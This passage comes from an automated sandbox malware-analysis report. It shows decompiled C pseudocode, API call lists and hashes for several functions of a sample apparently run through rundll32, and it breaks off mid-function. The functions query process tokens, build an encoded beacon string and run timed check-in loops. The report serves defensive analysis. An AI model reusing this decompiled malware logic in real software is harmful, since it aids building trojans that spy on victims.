                                          • Opcode ID: b257b1cc7317eb6c4e809f60b873b39e0f60bea39810a47e11a0064be6b3bfc5
                                          • Instruction ID: c3b792216af3722d6eb971207285e1c314a0aac9e65f342431b09b8a59978ef5
                                          • Opcode Fuzzy Hash: b257b1cc7317eb6c4e809f60b873b39e0f60bea39810a47e11a0064be6b3bfc5
                                          • Instruction Fuzzy Hash: 57815C75D00159AFDF119FE5DC84AEEBBB9EF44304F11816AE905E62A0D734AE84CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C071B9, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E04C071B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04C058BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04C0147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                          0x04c071c6
                                          0x04c071c7
                                          0x04c071c8
                                          0x04c071c9
                                          0x04c071ca
                                          0x04c071ce
                                          0x04c071d5
                                          0x04c071e4
                                          0x04c071e7
                                          0x04c071ea
                                          0x04c071f1
                                          0x04c071f4
                                          0x04c071f7
                                          0x04c071fa
                                          0x04c071fd
                                          0x04c07208
                                          0x04c0720a
                                          0x04c07213
                                          0x04c0721b
                                          0x04c0721d
                                          0x04c0722f
                                          0x04c07239
                                          0x04c0723d
                                          0x04c0724c
                                          0x04c07250
                                          0x04c07259
                                          0x04c07261
                                          0x04c07261
                                          0x04c07263
                                          0x04c07263
                                          0x04c0726b
                                          0x04c07271
                                          0x04c07275
                                          0x04c07275
                                          0x04c07280

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04C07200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04C07213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C0722F
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04C0724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04C07259
                                          • NtClose.NTDLL(?), ref: 04C0726B
                                          • NtClose.NTDLL(00000000), ref: 04C07275
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 6791736ea0966cd07c481110f1f23e6c4748ad3288befe2d51032b1f92085496
                                          • Instruction ID: 240ae57e7b6782a75502ab1c243508f405b44d64b0427ed4192dcbd1c5f20ed4
                                          • Opcode Fuzzy Hash: 6791736ea0966cd07c481110f1f23e6c4748ad3288befe2d51032b1f92085496
                                          • Instruction Fuzzy Hash: A221E6B6900218FBDB019F95CC85ADEBFBDFF48740F108166FA00A6150D7B5AB44EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C01754, Relevance: 33.2, APIs: 22, Instructions: 248memorystringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04C01754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t69;
				int _t72;
				void* _t73;
				void* _t74;
				void* _t76;
				void* _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr _t95;
				void* _t97;
				intOrPtr _t104;
				signed int _t108;
				char** _t110;
				int _t113;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr _t125;
				intOrPtr _t130;
				int _t134;
				CHAR* _t136;
				intOrPtr _t137;
				void* _t138;
				void* _t147;
				int _t148;
				void* _t149;
				intOrPtr _t150;
				void* _t152;
				long _t156;
				intOrPtr* _t157;
				intOrPtr* _t158;
				intOrPtr* _t161;
				void* _t162;
				void* _t164;

				_t147 = __edx;
				_t138 = __ecx;
				_t60 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t60 = GetTickCount();
				}
				_t61 =  *0x4c0d018; // 0x3df0b315
				asm("bswap eax");
				_t62 =  *0x4c0d014; // 0x3a87c8cd
				_t136 = _a16;
				asm("bswap eax");
				_t63 =  *0x4c0d010; // 0xd8d2f808
				asm("bswap eax");
				_t64 =  *0x4c0d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t65 =  *0x4c0d2a4; // 0x97a5a8
				_t3 = _t65 + 0x4c0e633; // 0x74666f73
				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x4c0d02c,  *0x4c0d004, _t60);
				_t68 = E04C057AB();
				_t69 =  *0x4c0d2a4; // 0x97a5a8
				_t4 = _t69 + 0x4c0e673; // 0x74707526
				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
				_t164 = _t162 + 0x38;
				_t149 = _t148 + _t72; // executed
				_t73 = E04C073E9(_t138); // executed
				_t137 = __imp__;
				_v8 = _t73;
				if(_t73 != 0) {
					_t130 =  *0x4c0d2a4; // 0x97a5a8
					_t7 = _t130 + 0x4c0e8cb; // 0x736e6426
					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
					_t164 = _t164 + 0xc;
					_t149 = _t149 + _t134;
					HeapFree( *0x4c0d238, 0, _v8);
				}
				_t74 = E04C0614A();
				_v8 = _t74;
				if(_t74 != 0) {
					_t125 =  *0x4c0d2a4; // 0x97a5a8
					_t11 = _t125 + 0x4c0e8d3; // 0x6f687726
					wsprintfA(_t149 + _a16, _t11, _t74);
					_t164 = _t164 + 0xc;
					HeapFree( *0x4c0d238, 0, _v8);
				}
				_t150 =  *0x4c0d324; // 0x55895b0
				_t76 = E04C0757B(0x4c0d00a, _t150 + 4);
				_t156 = 0;
				_v20 = _t76;
				if(_t76 == 0) {
					L26:
					HeapFree( *0x4c0d238, _t156, _a16);
					return _v12;
				} else {
					_t79 = RtlAllocateHeap( *0x4c0d238, 0, 0x800);
					_v8 = _t79;
					if(_t79 == 0) {
						L25:
						HeapFree( *0x4c0d238, _t156, _v20);
						goto L26;
					}
					E04C0749F(GetTickCount());
					_t83 =  *0x4c0d324; // 0x55895b0
					__imp__(_t83 + 0x40);
					asm("lock xadd [eax], ecx");
					_t87 =  *0x4c0d324; // 0x55895b0
					__imp__(_t87 + 0x40);
					_t89 =  *0x4c0d324; // 0x55895b0
					_t152 = E04C04D2C(1, _t147, _a16,  *_t89);
					_v28 = _t152;
					asm("lock xadd [eax], ecx");
					if(_t152 == 0) {
						L24:
						HeapFree( *0x4c0d238, _t156, _v8);
						goto L25;
					}
					StrTrimA(_t152, 0x4c0c294);
					_t95 =  *0x4c0d2a4; // 0x97a5a8
					_push(_t152);
					_t18 = _t95 + 0x4c0e252; // 0x616d692f
					_t97 = E04C09DEF(_t18);
					_v16 = _t97;
					if(_t97 == 0) {
						L23:
						HeapFree( *0x4c0d238, _t156, _t152);
						goto L24;
					}
					_t157 = __imp__;
					 *_t157(_t152, _a4);
					 *_t157(_v8, _v20);
					_t158 = __imp__;
					 *_t158(_v8, _v16);
					 *_t158(_v8, _t152);
					_t104 = E04C0A5E9(0, _v8);
					_a4 = _t104;
					if(_t104 == 0) {
						_v12 = 8;
						L21:
						E04C06106();
						L22:
						HeapFree( *0x4c0d238, 0, _v16);
						_t156 = 0;
						goto L23;
					}
					_t108 = E04C02F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
					_v12 = _t108;
					if(_t108 == 0) {
						_t161 = _v24;
						_v12 = E04C0A060(_t161, _a4, _a8, _a12);
						_t116 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
						_t118 =  *((intOrPtr*)(_t161 + 8));
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						_t120 =  *((intOrPtr*)(_t161 + 4));
						 *((intOrPtr*)( *_t120 + 8))(_t120);
						_t122 =  *_t161;
						 *((intOrPtr*)( *_t122 + 8))(_t122);
						E04C0147E(_t161);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t110 = _a8;
							if(_t110 != 0) {
								_t153 =  *_t110;
								_t159 =  *_a12;
								wcstombs( *_t110,  *_t110,  *_a12);
								_t113 = E04C01600(_t153, _t153, _t159 >> 1);
								_t152 = _v28;
								 *_a12 = _t113;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E04C0147E(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                          0x04c01754
                                          0x04c01754
                                          0x04c01754
                                          0x04c0175d
                                          0x04c01766
                                          0x04c01768
                                          0x04c01768
                                          0x04c01775
                                          0x04c01780
                                          0x04c01783
                                          0x04c01788
                                          0x04c01791
                                          0x04c01794
                                          0x04c01799
                                          0x04c0179c
                                          0x04c017a1
                                          0x04c017a4
                                          0x04c017b0
                                          0x04c017bd
                                          0x04c017bf
                                          0x04c017c5
                                          0x04c017ca
                                          0x04c017d5
                                          0x04c017d7
                                          0x04c017da
                                          0x04c017dc
                                          0x04c017e1
                                          0x04c017e7
                                          0x04c017ec
                                          0x04c017ef
                                          0x04c017f4
                                          0x04c01801
                                          0x04c01803
                                          0x04c01809
                                          0x04c01813
                                          0x04c01813
                                          0x04c01815
                                          0x04c0181a
                                          0x04c0181f
                                          0x04c01822
                                          0x04c01827
                                          0x04c01834
                                          0x04c01836
                                          0x04c01844
                                          0x04c01844
                                          0x04c01846
                                          0x04c01854
                                          0x04c01859
                                          0x04c0185b
                                          0x04c01860
                                          0x04c01a2f
                                          0x04c01a39
                                          0x04c01a42
                                          0x04c01866
                                          0x04c01872
                                          0x04c01878
                                          0x04c0187d
                                          0x04c01a23
                                          0x04c01a2d
                                          0x00000000
                                          0x04c01a2d
                                          0x04c01889
                                          0x04c0188e
                                          0x04c01897
                                          0x04c018a8
                                          0x04c018ac
                                          0x04c018b5
                                          0x04c018bb
                                          0x04c018ca
                                          0x04c018d1
                                          0x04c018da
                                          0x04c018e0
                                          0x04c01a17
                                          0x04c01a21
                                          0x00000000
                                          0x04c01a21
                                          0x04c018ec
                                          0x04c018f2
                                          0x04c018f7
                                          0x04c018f8
                                          0x04c018ff
                                          0x04c01904
                                          0x04c01909
                                          0x04c01a0d
                                          0x04c01a15
                                          0x00000000
                                          0x04c01a15
                                          0x04c01912
                                          0x04c01919
                                          0x04c01921
                                          0x04c01926
                                          0x04c0192f
                                          0x04c01935
                                          0x04c0193c
                                          0x04c01941
                                          0x04c01946
                                          0x04c01a45
                                          0x04c019f9
                                          0x04c019f9
                                          0x04c019fe
                                          0x04c01a09
                                          0x04c01a0b
                                          0x00000000
                                          0x04c01a0b
                                          0x04c01950
                                          0x04c01955
                                          0x04c0195a
                                          0x04c0195f
                                          0x04c0196f
                                          0x04c01972
                                          0x04c01978
                                          0x04c0197e
                                          0x04c01984
                                          0x04c01987
                                          0x04c0198d
                                          0x04c01990
                                          0x04c01995
                                          0x04c01999
                                          0x04c01999
                                          0x04c019a5
                                          0x04c019b1
                                          0x04c019b5
                                          0x04c019b7
                                          0x04c019bc
                                          0x04c019be
                                          0x04c019c3
                                          0x04c019c8
                                          0x04c019d5
                                          0x04c019dd
                                          0x04c019e0
                                          0x04c019e0
                                          0x04c019bc
                                          0x00000000
                                          0x04c019a7
                                          0x04c019ab
                                          0x04c019e2
                                          0x04c019e5
                                          0x04c019ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c019ee
                                          0x04c019ad
                                          0x00000000
                                          0x04c019ad
                                          0x04c019a5

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 04C01768
                                          • wsprintfA.USER32 ref: 04C017B8
                                          • wsprintfA.USER32 ref: 04C017D5
                                          • wsprintfA.USER32 ref: 04C01801
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01813
                                          • wsprintfA.USER32 ref: 04C01834
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01844
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04C01872
                                          • GetTickCount.KERNEL32 ref: 04C01883
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C01897
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C018B5
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04C052FE,?,055895B0), ref: 04C04D57
                                            • Part of subcall function 04C04D2C: lstrlen.KERNEL32(?,?,?,04C052FE,?,055895B0), ref: 04C04D5F
                                            • Part of subcall function 04C04D2C: strcpy.NTDLL ref: 04C04D76
                                            • Part of subcall function 04C04D2C: lstrcat.KERNEL32(00000000,?), ref: 04C04D81
                                            • Part of subcall function 04C04D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C052FE,?,055895B0), ref: 04C04D9E
                                          • StrTrimA.SHLWAPI(00000000,04C0C294,?,055895B0), ref: 04C018EC
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?,00000000,00000000,04C05335,616D692F,00000000), ref: 04C09DFB
                                            • Part of subcall function 04C09DEF: lstrlen.KERNEL32(?), ref: 04C09E03
                                            • Part of subcall function 04C09DEF: lstrcpy.KERNEL32(00000000,?), ref: 04C09E1A
                                            • Part of subcall function 04C09DEF: lstrcat.KERNEL32(00000000,?), ref: 04C09E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C01919
                                          • lstrcpy.KERNEL32(?,?), ref: 04C01921
                                          • lstrcat.KERNEL32(?,?), ref: 04C0192F
                                          • lstrcat.KERNEL32(?,00000000), ref: 04C01935
                                            • Part of subcall function 04C0A5E9: lstrlen.KERNEL32(?,00000000,04C0D330,00000001,04C0937A,04C0D00C,04C0D00C,00000000,00000005,00000000,00000000,?,?,?,04C0207E,?), ref: 04C0A5F2
                                            • Part of subcall function 04C0A5E9: mbstowcs.NTDLL ref: 04C0A619
                                            • Part of subcall function 04C0A5E9: memset.NTDLL ref: 04C0A62B
                                          • wcstombs.NTDLL ref: 04C019C8
                                            • Part of subcall function 04C0A060: SysAllocString.OLEAUT32(?), ref: 04C0A09B
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04C01A09
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 04C01A15
                                          • HeapFree.KERNEL32(00000000,?,?,055895B0), ref: 04C01A21
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01A2D
                                          • HeapFree.KERNEL32(00000000,?), ref: 04C01A39
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                          • String ID:
                                          • API String ID: 3748877296-0
                                          • Opcode ID: 49442c9e0ec4bb6435fb4503178cf091f521186e776fb94e846b5c5b15b07f1d
                                          • Instruction ID: 6fd08248bfe7406f485612fc430fc154946cd14df7e9799d367feb9ecced4cd6
                                          • Opcode Fuzzy Hash: 49442c9e0ec4bb6435fb4503178cf091f521186e776fb94e846b5c5b15b07f1d
                                          • Instruction Fuzzy Hash: 62914E75900108AFDB11DFA8DC44BAEBBBAEF08314F158154F509D72A0DB35ED91DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C09B6F, Relevance: 16.7, APIs: 11, Instructions: 152timememoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 97 4c09b6f-4c09ba1 memset CreateWaitableTimerA 98 4c09d23-4c09d29 GetLastError 97->98 99 4c09ba7-4c09c00 _allmul SetWaitableTimer WaitForMultipleObjects 97->99 100 4c09d2d-4c09d37 98->100 101 4c09c06-4c09c09 99->101 102 4c09c8b-4c09c91 99->102 103 4c09c14 101->103 104 4c09c0b call 4c068cf 101->104 105 4c09c92-4c09c96 102->105 109 4c09c1e 103->109 110 4c09c10-4c09c12 104->110 107 4c09ca6-4c09caa 105->107 108 4c09c98-4c09ca0 HeapFree 105->108 107->105 111 4c09cac-4c09cb6 CloseHandle 107->111 108->107 112 4c09c22-4c09c27 109->112 110->103 110->109 111->100 113 4c09c29-4c09c30 112->113 114 4c09c3a-4c09c5d call 4c09f11 112->114 113->114 115 4c09c32 113->115 117 4c09c62-4c09c68 114->117 115->114 118 4c09cb8-4c09cbd 117->118 119 4c09c6a-4c09c75 117->119 121 4c09cdc-4c09ce4 118->121 122 4c09cbf-4c09cc5 118->122 119->112 120 4c09c77-4c09c87 call 4c054ac 119->120 120->102 124 4c09cea-4c09d18 _allmul SetWaitableTimer WaitForMultipleObjects 121->124 122->102 123 4c09cc7-4c09cda call 4c06106 122->123 123->124 124->112 127 4c09d1e 124->127 127->102
                                          C-Code - Quality: 83%
                                          			E04C09B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				intOrPtr _v120;
				struct %anon52 _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				struct %anon52 _t65;
				void* _t68;
				void* _t72;
				signed int _t73;
				void* _t75;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t75 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4c0d240);
					_v76 = 0;
					_v80 = 0;
					L04C0B088();
					_v84.LowPart = _t46;
					_v80 = _t75;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4c0d26c; // 0x40c
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4c0d24c = 5;
						} else {
							_t68 = E04C068CF(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4c0d260 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t73 = _v104.LowPart;
						_t58 = _t73 << 4;
						_t78 = _t89 + (_t73 << 4) + 0x3c;
						_t74 = _t73 + 1;
						_v92.LowPart = _t73 + 1;
						_t60 = E04C09F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
						_v128.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v92;
						_v104.LowPart = _t65;
						_t97 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v120 = E04C054AC(_t74, _t97,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4c0d244);
							goto L21;
						} else {
							__eflags =  *0x4c0d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E04C06106();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4c0d248);
								L21:
								L04C0B088();
								_v104.LowPart = _t60;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0);
								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t72 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x4c0d238, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                                          0x04c09b6f
                                          0x04c09b85
                                          0x04c09b89
                                          0x04c09b8e
                                          0x04c09b95
                                          0x04c09b9b
                                          0x04c09ba1
                                          0x04c09d29
                                          0x04c09ba7
                                          0x04c09ba7
                                          0x04c09ba9
                                          0x04c09bae
                                          0x04c09baf
                                          0x04c09bb5
                                          0x04c09bb9
                                          0x04c09bbd
                                          0x04c09bcb
                                          0x04c09bd9
                                          0x04c09bdd
                                          0x04c09bdf
                                          0x04c09bec
                                          0x04c09bf8
                                          0x04c09bfa
                                          0x04c09c00
                                          0x04c09c09
                                          0x04c09c14
                                          0x04c09c14
                                          0x04c09c0b
                                          0x04c09c0b
                                          0x04c09c12
                                          0x00000000
                                          0x00000000
                                          0x04c09c12
                                          0x04c09c1e
                                          0x00000000
                                          0x04c09c22
                                          0x04c09c27
                                          0x04c09c32
                                          0x04c09c32
                                          0x04c09c3a
                                          0x04c09c45
                                          0x04c09c4d
                                          0x04c09c56
                                          0x04c09c59
                                          0x04c09c5d
                                          0x04c09c62
                                          0x04c09c68
                                          0x00000000
                                          0x00000000
                                          0x04c09c6a
                                          0x04c09c6e
                                          0x04c09c72
                                          0x04c09c75
                                          0x00000000
                                          0x04c09c77
                                          0x04c09c87
                                          0x04c09c87
                                          0x00000000
                                          0x04c09cb8
                                          0x04c09cb8
                                          0x04c09cbd
                                          0x04c09cdc
                                          0x04c09cde
                                          0x04c09ce3
                                          0x04c09ce4
                                          0x00000000
                                          0x04c09cbf
                                          0x04c09cbf
                                          0x04c09cc5
                                          0x00000000
                                          0x04c09cc7
                                          0x04c09cc7
                                          0x04c09ccc
                                          0x04c09cce
                                          0x04c09cd3
                                          0x04c09cd4
                                          0x04c09cea
                                          0x04c09cea
                                          0x04c09cf2
                                          0x04c09d00
                                          0x04c09d04
                                          0x04c09d10
                                          0x04c09d12
                                          0x04c09d16
                                          0x04c09d18
                                          0x00000000
                                          0x04c09d1e
                                          0x00000000
                                          0x04c09d1e
                                          0x04c09d18
                                          0x04c09cc5
                                          0x00000000
                                          0x04c09cbd
                                          0x04c09c8b
                                          0x04c09c8d
                                          0x04c09c91
                                          0x04c09c92
                                          0x04c09c92
                                          0x04c09c96
                                          0x04c09ca0
                                          0x04c09ca0
                                          0x04c09ca6
                                          0x04c09ca9
                                          0x04c09ca9
                                          0x04c09cb0
                                          0x04c09cb0
                                          0x04c09d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 04C09B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04C09B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04C09BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04C09BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04C04AC4,?), ref: 04C09BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04C04AC4,?,00000000), ref: 04C09CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04C04AC4,?,00000000,?,?), ref: 04C09CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04C09CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 04C09D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04C09D10
                                            • Part of subcall function 04C068CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05589388,00000000,?,7519F710,00000000,7519F730), ref: 04C0691E
                                            • Part of subcall function 04C068CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,055893C0,?,00000000,30314549,00000014,004F0053,0558937C), ref: 04C069BB
                                            • Part of subcall function 04C068CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04C09C10), ref: 04C069CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04C04AC4,?,00000000,?,?), ref: 04C09D23
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 31c6a0e535f7e66171dd72c51b4adfdeaf084449d869b8998fa57114e1fe81d6
                                          • Instruction ID: 3d5628a3d2cf4409c6b009be096d982123674987290cf38903f9aa127b9a6e02
                                          • Opcode Fuzzy Hash: 31c6a0e535f7e66171dd72c51b4adfdeaf084449d869b8998fa57114e1fe81d6
                                          • Instruction Fuzzy Hash: 01519DF1409320AFD720EF55DC44EABBBE9EF85724F408A19F8A582191D774EA44CF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C01A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E04C01A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04C0B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4c0d2a4; // 0x97a5a8
				_t5 = _t13 + 0x4c0e836; // 0x5588dde
				_t6 = _t13 + 0x4c0e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04C0AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0x4c0d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
